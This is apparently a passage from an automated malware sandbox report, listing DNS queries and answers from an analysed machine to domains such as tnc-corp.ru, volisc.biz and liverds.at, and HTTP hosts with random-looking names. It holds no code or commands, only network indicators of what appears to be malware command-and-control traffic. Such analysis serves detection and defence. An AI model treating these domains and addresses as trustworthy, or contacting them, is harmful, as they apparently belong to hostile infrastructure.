                                              Oct 20, 2024 06:02:23.452756882 CEST192.168.2.41.1.1.10x8d2dStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:24.443025112 CEST192.168.2.41.1.1.10x8d2dStandard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:29.066656113 CEST192.168.2.41.1.1.10xcc4cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:30.052763939 CEST192.168.2.41.1.1.10xcc4cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:31.053829908 CEST192.168.2.41.1.1.10xcc4cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:33.052539110 CEST192.168.2.41.1.1.10xcc4cStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.271102905 CEST192.168.2.41.1.1.10x5d7Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.281821966 CEST192.168.2.41.1.1.10x412aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:36.271622896 CEST192.168.2.41.1.1.10x412aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:37.286936998 CEST192.168.2.41.1.1.10x412aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:39.287017107 CEST192.168.2.41.1.1.10x412aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:48.111795902 CEST192.168.2.41.1.1.10x2471Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:49.116193056 CEST192.168.2.41.1.1.10x2471Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:50.115669012 CEST192.168.2.41.1.1.10x2471Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:52.115117073 CEST192.168.2.41.1.1.10x2471Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.374310017 CEST192.168.2.41.1.1.10x5a2cStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.422172070 CEST192.168.2.41.1.1.10x3b9dStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:55.418617964 CEST192.168.2.41.1.1.10x3b9dStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:56.428385973 CEST192.168.2.41.1.1.10x3b9dStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:58.560297966 CEST192.168.2.41.1.1.10x3b9dStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:03.798331976 CEST192.168.2.41.1.1.10xa303Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:04.803531885 CEST192.168.2.41.1.1.10xa303Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:05.822396994 CEST192.168.2.41.1.1.10xa303Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:07.820353031 CEST192.168.2.41.1.1.10xa303Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:09.998655081 CEST192.168.2.41.1.1.10x5e99Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:10.020721912 CEST192.168.2.41.1.1.10x883cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:11.021517992 CEST192.168.2.41.1.1.10x883cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:12.037214994 CEST192.168.2.41.1.1.10x883cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:14.037036896 CEST192.168.2.41.1.1.10x883cStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:21.862377882 CEST192.168.2.41.1.1.10x32c4Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:22.849551916 CEST192.168.2.41.1.1.10x32c4Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:23.865495920 CEST192.168.2.41.1.1.10x32c4Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:25.880780935 CEST192.168.2.41.1.1.10x32c4Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.191004038 CEST192.168.2.41.1.1.10xec6dStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.202442884 CEST192.168.2.41.1.1.10xaf11Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:29.361452103 CEST192.168.2.41.1.1.10xaf11Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:30.366839886 CEST192.168.2.41.1.1.10xaf11Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:37.762324095 CEST192.168.2.41.1.1.10x4915Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:38.764034986 CEST192.168.2.41.1.1.10x4915Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:39.775680065 CEST192.168.2.41.1.1.10x4915Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:41.781719923 CEST192.168.2.41.1.1.10x4915Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.985183001 CEST192.168.2.41.1.1.10xfb6dStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.996458054 CEST192.168.2.41.1.1.10x35b0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:45.017965078 CEST192.168.2.41.1.1.10x35b0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:46.010179043 CEST192.168.2.41.1.1.10x35b0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:54.693775892 CEST192.168.2.41.1.1.10xbd9bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:55.709264994 CEST192.168.2.41.1.1.10xbd9bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:56.711445093 CEST192.168.2.41.1.1.10xbd9bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:58.730252981 CEST192.168.2.41.1.1.10xbd9bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.754718065 CEST192.168.2.41.1.1.10x260fStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.780143976 CEST192.168.2.41.1.1.10x8e5aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:03.771567106 CEST192.168.2.41.1.1.10x8e5aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:04.771477938 CEST192.168.2.41.1.1.10x8e5aStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:09.141108036 CEST192.168.2.41.1.1.10xa8e3Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:10.146533012 CEST192.168.2.41.1.1.10xa8e3Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.146544933 CEST192.168.2.41.1.1.10xa8e3Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:13.497422934 CEST192.168.2.41.1.1.10xc8b9Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:14.490206957 CEST192.168.2.41.1.1.10xc8b9Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:21.724271059 CEST192.168.2.41.1.1.10xe091Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:21.735491991 CEST192.168.2.41.1.1.10xe7e2Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:22.725940943 CEST192.168.2.41.1.1.10xe7e2Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:23.743175030 CEST192.168.2.41.1.1.10xe7e2Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:25.757951021 CEST192.168.2.41.1.1.10xe7e2Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:33.383588076 CEST192.168.2.41.1.1.10xb446Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:34.380913973 CEST192.168.2.41.1.1.10xb446Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:35.397222042 CEST192.168.2.41.1.1.10xb446Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:37.412142992 CEST192.168.2.41.1.1.10xb446Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.661550045 CEST192.168.2.41.1.1.10xafa0Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.696885109 CEST192.168.2.41.1.1.10x88ceStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:40.709117889 CEST192.168.2.41.1.1.10x88ceStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:41.709932089 CEST192.168.2.41.1.1.10x88ceStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:43.709012032 CEST192.168.2.41.1.1.10x88ceStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:50.380108118 CEST192.168.2.41.1.1.10x72c2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:51.384907007 CEST192.168.2.41.1.1.10x72c2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:52.396862030 CEST192.168.2.41.1.1.10x72c2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:54.403475046 CEST192.168.2.41.1.1.10x72c2Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.611051083 CEST192.168.2.41.1.1.10x637aStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.637810946 CEST192.168.2.41.1.1.10x961bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:57.630898952 CEST192.168.2.41.1.1.10x961bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:58.652486086 CEST192.168.2.41.1.1.10x961bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:06:00.662128925 CEST192.168.2.41.1.1.10x961bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru187.204.28.205A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru189.181.30.147A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru190.218.17.143A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru190.187.52.42A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru177.129.90.106A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru95.86.30.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru187.228.106.109A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:25.741895914 CEST1.1.1.1192.168.2.40x8d2dNo error (0)tnc-corp.ru152.231.120.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.266899109 CEST1.1.1.1192.168.2.40xcc4cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.266913891 CEST1.1.1.1192.168.2.40xcc4cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.266922951 CEST1.1.1.1192.168.2.40xcc4cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.266932011 CEST1.1.1.1192.168.2.40xcc4cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:35.279709101 CEST1.1.1.1192.168.2.40x5d7Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:41.426759005 CEST1.1.1.1192.168.2.40x412aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:41.426774979 CEST1.1.1.1192.168.2.40x412aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:41.426783085 CEST1.1.1.1192.168.2.40x412aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:02:41.426793098 CEST1.1.1.1192.168.2.40x412aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.340567112 CEST1.1.1.1192.168.2.40x2471Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.340609074 CEST1.1.1.1192.168.2.40x2471Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.340636969 CEST1.1.1.1192.168.2.40x2471Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.340667963 CEST1.1.1.1192.168.2.40x2471Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:03:54.383609056 CEST1.1.1.1192.168.2.40x5a2cName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:00.589171886 CEST1.1.1.1192.168.2.40x3b9dServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:00.589210987 CEST1.1.1.1192.168.2.40x3b9dServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:00.589222908 CEST1.1.1.1192.168.2.40x3b9dServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:00.589234114 CEST1.1.1.1192.168.2.40x3b9dServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:09.986706972 CEST1.1.1.1192.168.2.40xa303Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:09.986751080 CEST1.1.1.1192.168.2.40xa303Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:09.986778975 CEST1.1.1.1192.168.2.40xa303Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:09.986804962 CEST1.1.1.1192.168.2.40xa303Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:10.008263111 CEST1.1.1.1192.168.2.40x5e99Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:16.183670998 CEST1.1.1.1192.168.2.40x883cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:16.183717012 CEST1.1.1.1192.168.2.40x883cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:16.183760881 CEST1.1.1.1192.168.2.40x883cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:16.183788061 CEST1.1.1.1192.168.2.40x883cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.185077906 CEST1.1.1.1192.168.2.40x32c4Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.185116053 CEST1.1.1.1192.168.2.40x32c4Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.185142994 CEST1.1.1.1192.168.2.40x32c4Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.185168982 CEST1.1.1.1192.168.2.40x32c4Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:28.200258017 CEST1.1.1.1192.168.2.40xec6dName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:32.239702940 CEST1.1.1.1192.168.2.40xaf11Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:32.239742994 CEST1.1.1.1192.168.2.40xaf11Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:32.239770889 CEST1.1.1.1192.168.2.40xaf11Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.959927082 CEST1.1.1.1192.168.2.40x4915Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.959966898 CEST1.1.1.1192.168.2.40x4915Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.960012913 CEST1.1.1.1192.168.2.40x4915Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.960038900 CEST1.1.1.1192.168.2.40x4915Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:43.994116068 CEST1.1.1.1192.168.2.40xfb6dName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:48.007585049 CEST1.1.1.1192.168.2.40x35b0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:48.007607937 CEST1.1.1.1192.168.2.40x35b0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:04:48.007621050 CEST1.1.1.1192.168.2.40x35b0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.708540916 CEST1.1.1.1192.168.2.40xbd9bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.708580971 CEST1.1.1.1192.168.2.40xbd9bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.708609104 CEST1.1.1.1192.168.2.40xbd9bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.708636045 CEST1.1.1.1192.168.2.40xbd9bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:02.764462948 CEST1.1.1.1192.168.2.40x260fName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:04.788497925 CEST1.1.1.1192.168.2.40x8e5aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:04.788538933 CEST1.1.1.1192.168.2.40x8e5aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:04.788570881 CEST1.1.1.1192.168.2.40x8e5aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru152.231.120.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru187.204.28.205A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru189.181.30.147A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.218.17.143A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.187.52.42A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru177.129.90.106A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru95.86.30.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495147943 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru187.228.106.109A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru152.231.120.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru187.204.28.205A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru189.181.30.147A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.218.17.143A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.187.52.42A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru177.129.90.106A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru95.86.30.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495191097 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru187.228.106.109A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru152.231.120.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru187.204.28.205A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.249.249.14A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru189.181.30.147A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.218.17.143A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru190.187.52.42A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru181.123.219.23A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru177.129.90.106A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru95.86.30.3A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:11.495219946 CEST1.1.1.1192.168.2.40xa8e3No error (0)tnc-corp.ru187.228.106.109A (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:20.337811947 CEST1.1.1.1192.168.2.40xc8b9Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:21.733058929 CEST1.1.1.1192.168.2.40xe091Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:27.945332050 CEST1.1.1.1192.168.2.40xe7e2Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:27.945372105 CEST1.1.1.1192.168.2.40xe7e2Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:27.945400000 CEST1.1.1.1192.168.2.40xe7e2Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:27.945426941 CEST1.1.1.1192.168.2.40xe7e2Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.637048006 CEST1.1.1.1192.168.2.40xb446Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.637089014 CEST1.1.1.1192.168.2.40xb446Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.637100935 CEST1.1.1.1192.168.2.40xb446Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.637113094 CEST1.1.1.1192.168.2.40xb446Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:39.670794010 CEST1.1.1.1192.168.2.40xafa0Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:43.822143078 CEST1.1.1.1192.168.2.40x88ceServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:43.822181940 CEST1.1.1.1192.168.2.40x88ceServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:43.822210073 CEST1.1.1.1192.168.2.40x88ceServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:43.822236061 CEST1.1.1.1192.168.2.40x88ceServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.591583967 CEST1.1.1.1192.168.2.40x72c2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.591639042 CEST1.1.1.1192.168.2.40x72c2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.591665983 CEST1.1.1.1192.168.2.40x72c2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.591694117 CEST1.1.1.1192.168.2.40x72c2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:05:56.619939089 CEST1.1.1.1192.168.2.40x637aName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:06:02.934820890 CEST1.1.1.1192.168.2.40x961bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:06:02.934834957 CEST1.1.1.1192.168.2.40x961bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:06:02.934844017 CEST1.1.1.1192.168.2.40x961bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              Oct 20, 2024 06:06:02.934853077 CEST1.1.1.1192.168.2.40x961bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                              • kquacpdyiao.org
                                                • tnc-corp.ru
                                              • dokhxstskamwqb.com
                                              • xueqsaqwudqkfjhf.com
